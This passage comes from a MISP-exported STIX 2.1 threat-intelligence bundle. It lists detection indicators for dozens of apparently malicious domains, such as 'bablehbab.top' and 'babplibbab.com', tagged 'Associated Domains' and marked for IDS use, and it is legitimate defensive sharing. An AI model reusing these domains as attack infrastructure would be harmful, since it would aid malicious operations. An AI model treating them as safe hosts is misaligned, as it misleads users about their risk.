"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db6c39-ffa4-4029-a678-4133950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:22:07.000Z",
|
|
"modified": "2017-03-29T09:22:07.000Z",
|
|
"description": "Associated Domains",
|
|
"pattern": "[domain-name:value = 'bablehbab.top']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:22:07Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Network activity"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"domain\"",
|
|
"misp:category=\"Network activity\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db6c3a-ff84-4439-b7f6-427d950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:22:07.000Z",
|
|
"modified": "2017-03-29T09:22:07.000Z",
|
|
"description": "Associated Domains",
|
|
"pattern": "[domain-name:value = 'bablibbab2.xyz']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:22:07Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Network activity"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"domain\"",
|
|
"misp:category=\"Network activity\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db6c3b-9fec-4a6d-9f3f-4f7d950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:22:07.000Z",
|
|
"modified": "2017-03-29T09:22:07.000Z",
|
|
"description": "Associated Domains",
|
|
"pattern": "[domain-name:value = 'bablihbab.link']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:22:07Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Network activity"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"domain\"",
|
|
"misp:category=\"Network activity\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db6c3c-3d10-4c0e-94ac-4645950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:22:07.000Z",
|
|
"modified": "2017-03-29T09:22:07.000Z",
|
|
"description": "Associated Domains",
|
|
"pattern": "[domain-name:value = 'bablohbab.pw']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:22:07Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Network activity"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"domain\"",
|
|
"misp:category=\"Network activity\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db6c3d-5920-460f-8e5e-44cf950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:22:07.000Z",
|
|
"modified": "2017-03-29T09:22:07.000Z",
|
|
"description": "Associated Domains",
|
|
"pattern": "[domain-name:value = 'bablulbab.pw']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:22:07Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Network activity"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"domain\"",
|
|
"misp:category=\"Network activity\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db6c3e-85f4-43e0-90a5-447e950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:22:07.000Z",
|
|
"modified": "2017-03-29T09:22:07.000Z",
|
|
"description": "Associated Domains",
|
|
"pattern": "[domain-name:value = 'babmabbab.xyz']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:22:07Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Network activity"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"domain\"",
|
|
"misp:category=\"Network activity\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db6c3f-5a90-4c3e-85b6-42bc950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:22:07.000Z",
|
|
"modified": "2017-03-29T09:22:07.000Z",
|
|
"description": "Associated Domains",
|
|
"pattern": "[domain-name:value = 'babmabbab2.xyz']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:22:07Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Network activity"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"domain\"",
|
|
"misp:category=\"Network activity\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db6c3f-44f4-4208-891d-4de2950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:22:07.000Z",
|
|
"modified": "2017-03-29T09:22:07.000Z",
|
|
"description": "Associated Domains",
|
|
"pattern": "[domain-name:value = 'babmebbab.rocks']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:22:07Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Network activity"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"domain\"",
|
|
"misp:category=\"Network activity\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db6c40-c9f8-41ba-ba56-4d4a950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:22:07.000Z",
|
|
"modified": "2017-03-29T09:22:07.000Z",
|
|
"description": "Associated Domains",
|
|
"pattern": "[domain-name:value = 'babmebbab2.rocks']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:22:07Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Network activity"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"domain\"",
|
|
"misp:category=\"Network activity\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db6c41-9184-4bfd-99a4-457d950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:22:07.000Z",
|
|
"modified": "2017-03-29T09:22:07.000Z",
|
|
"description": "Associated Domains",
|
|
"pattern": "[domain-name:value = 'babmehbab.pw']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:22:07Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Network activity"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"domain\"",
|
|
"misp:category=\"Network activity\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db6c42-a04c-4e4f-9627-494a950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:22:07.000Z",
|
|
"modified": "2017-03-29T09:22:07.000Z",
|
|
"description": "Associated Domains",
|
|
"pattern": "[domain-name:value = 'babmibbab2.space']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:22:07Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Network activity"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"domain\"",
|
|
"misp:category=\"Network activity\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db6c43-d4d0-4445-a7ac-4c5d950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:22:07.000Z",
|
|
"modified": "2017-03-29T09:22:07.000Z",
|
|
"description": "Associated Domains",
|
|
"pattern": "[domain-name:value = 'babmihbab.xyz']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:22:07Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Network activity"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"domain\"",
|
|
"misp:category=\"Network activity\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db6c44-6aa4-43f6-9872-4384950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:22:07.000Z",
|
|
"modified": "2017-03-29T09:22:07.000Z",
|
|
"description": "Associated Domains",
|
|
"pattern": "[domain-name:value = 'babmilbab.pw']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:22:07Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Network activity"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"domain\"",
|
|
"misp:category=\"Network activity\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db6c44-7fc4-4aca-bc55-4610950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:22:07.000Z",
|
|
"modified": "2017-03-29T09:22:07.000Z",
|
|
"description": "Associated Domains",
|
|
"pattern": "[domain-name:value = 'babmohbab.rocks']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:22:07Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Network activity"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"domain\"",
|
|
"misp:category=\"Network activity\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db6c45-23d0-42de-87e0-4f23950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:22:07.000Z",
|
|
"modified": "2017-03-29T09:22:07.000Z",
|
|
"description": "Associated Domains",
|
|
"pattern": "[domain-name:value = 'babmulbab.rocks']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:22:07Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Network activity"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"domain\"",
|
|
"misp:category=\"Network activity\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db6c46-11fc-44ba-96b2-41a8950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:22:07.000Z",
|
|
"modified": "2017-03-29T09:22:07.000Z",
|
|
"description": "Associated Domains",
|
|
"pattern": "[domain-name:value = 'babnabbab2.space']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:22:07Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Network activity"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"domain\"",
|
|
"misp:category=\"Network activity\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db6c47-2024-4f01-b37c-4aa9950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:22:07.000Z",
|
|
"modified": "2017-03-29T09:22:07.000Z",
|
|
"description": "Associated Domains",
|
|
"pattern": "[domain-name:value = 'babnebbab.biz']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:22:07Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Network activity"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"domain\"",
|
|
"misp:category=\"Network activity\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db6c48-b880-483c-b964-4757950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:22:07.000Z",
|
|
"modified": "2017-03-29T09:22:07.000Z",
|
|
"description": "Associated Domains",
|
|
"pattern": "[domain-name:value = 'babnebbab2.biz']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:22:07Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Network activity"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"domain\"",
|
|
"misp:category=\"Network activity\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db6c49-9ef8-4764-88c4-44f3950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:22:07.000Z",
|
|
"modified": "2017-03-29T09:22:07.000Z",
|
|
"description": "Associated Domains",
|
|
"pattern": "[domain-name:value = 'babnehbab.rocks']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:22:07Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Network activity"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"domain\"",
|
|
"misp:category=\"Network activity\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db6c4a-4168-4e1b-9d93-4757950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:22:07.000Z",
|
|
"modified": "2017-03-29T09:22:07.000Z",
|
|
"description": "Associated Domains",
|
|
"pattern": "[domain-name:value = 'babnibbab2.in']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:22:07Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Network activity"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"domain\"",
|
|
"misp:category=\"Network activity\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db6c4a-c618-4e37-97ab-4602950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:22:07.000Z",
|
|
"modified": "2017-03-29T09:22:07.000Z",
|
|
"description": "Associated Domains",
|
|
"pattern": "[domain-name:value = 'babnihbab.space']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:22:07Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Network activity"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"domain\"",
|
|
"misp:category=\"Network activity\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db6c4b-478c-4a0f-bbcd-4c4f950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:22:07.000Z",
|
|
"modified": "2017-03-29T09:22:07.000Z",
|
|
"description": "Associated Domains",
|
|
"pattern": "[domain-name:value = 'babnohbab.biz']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:22:07Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Network activity"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"domain\"",
|
|
"misp:category=\"Network activity\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db6c4c-74bc-4990-b95a-4d0b950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:22:07.000Z",
|
|
"modified": "2017-03-29T09:22:07.000Z",
|
|
"description": "Associated Domains",
|
|
"pattern": "[domain-name:value = 'babnulbab.biz']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:22:07Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Network activity"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"domain\"",
|
|
"misp:category=\"Network activity\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db6c4d-0550-4e39-b5f9-4b58950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:22:07.000Z",
|
|
"modified": "2017-03-29T09:22:07.000Z",
|
|
"description": "Associated Domains",
|
|
"pattern": "[domain-name:value = 'babpabbab2.in']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:22:07Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Network activity"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"domain\"",
|
|
"misp:category=\"Network activity\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db6c4e-a4ec-4ac8-b02c-4876950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:22:07.000Z",
|
|
"modified": "2017-03-29T09:22:07.000Z",
|
|
"description": "Associated Domains",
|
|
"pattern": "[domain-name:value = 'babpebbab.org']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:22:07Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Network activity"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"domain\"",
|
|
"misp:category=\"Network activity\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db6c4f-f570-4857-9a6b-411f950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:22:07.000Z",
|
|
"modified": "2017-03-29T09:22:07.000Z",
|
|
"description": "Associated Domains",
|
|
"pattern": "[domain-name:value = 'babpebbab2.org']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:22:07Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Network activity"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"domain\"",
|
|
"misp:category=\"Network activity\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db6c50-951c-408e-aa98-4ecc950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:22:07.000Z",
|
|
"modified": "2017-03-29T09:22:07.000Z",
|
|
"description": "Associated Domains",
|
|
"pattern": "[domain-name:value = 'babpehbab.biz']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:22:07Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Network activity"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"domain\"",
|
|
"misp:category=\"Network activity\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db6c50-f1a0-4153-b127-427c950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:22:07.000Z",
|
|
"modified": "2017-03-29T09:22:07.000Z",
|
|
"description": "Associated Domains",
|
|
"pattern": "[domain-name:value = 'babpibbab2.ru']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:22:07Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Network activity"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"domain\"",
|
|
"misp:category=\"Network activity\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db6c51-294c-4a5f-b569-4c84950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:22:07.000Z",
|
|
"modified": "2017-03-29T09:22:07.000Z",
|
|
"description": "Associated Domains",
|
|
"pattern": "[domain-name:value = 'babpihbab.in']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:22:07Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Network activity"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"domain\"",
|
|
"misp:category=\"Network activity\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db6c52-93dc-4b4b-a003-4ff2950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:22:07.000Z",
|
|
"modified": "2017-03-29T09:22:07.000Z",
|
|
"description": "Associated Domains",
|
|
"pattern": "[domain-name:value = 'babplabbab2.org']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:22:07Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Network activity"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"domain\"",
|
|
"misp:category=\"Network activity\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db6c53-2384-41d4-805a-4dcf950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:22:07.000Z",
|
|
"modified": "2017-03-29T09:22:07.000Z",
|
|
"description": "Associated Domains",
|
|
"pattern": "[domain-name:value = 'babplebbab.ru']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:22:07Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Network activity"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"domain\"",
|
|
"misp:category=\"Network activity\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db6c54-68a0-44d5-8760-4920950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:22:07.000Z",
|
|
"modified": "2017-03-29T09:22:07.000Z",
|
|
"description": "Associated Domains",
|
|
"pattern": "[domain-name:value = 'babplebbab2.ru']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:22:07Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Network activity"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"domain\"",
|
|
"misp:category=\"Network activity\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db6c55-f07c-4a61-a586-490e950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:22:07.000Z",
|
|
"modified": "2017-03-29T09:22:07.000Z",
|
|
"description": "Associated Domains",
|
|
"pattern": "[domain-name:value = 'babplehbab.in']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:22:07Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Network activity"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"domain\"",
|
|
"misp:category=\"Network activity\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db6c56-d7cc-44ff-9f61-4b83950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:22:07.000Z",
|
|
"modified": "2017-03-29T09:22:07.000Z",
|
|
"description": "Associated Domains",
|
|
"pattern": "[domain-name:value = 'babplibbab.com']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:22:07Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Network activity"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"domain\"",
|
|
"misp:category=\"Network activity\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db6c57-45f8-4850-854e-4660950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:22:07.000Z",
|
|
"modified": "2017-03-29T09:22:07.000Z",
|
|
"description": "Associated Domains",
|
|
"pattern": "[domain-name:value = 'babplifbab.ru']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:22:07Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Network activity"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"domain\"",
|
|
"misp:category=\"Network activity\"",
|
|
"misp:to_ids=\"True\""
|
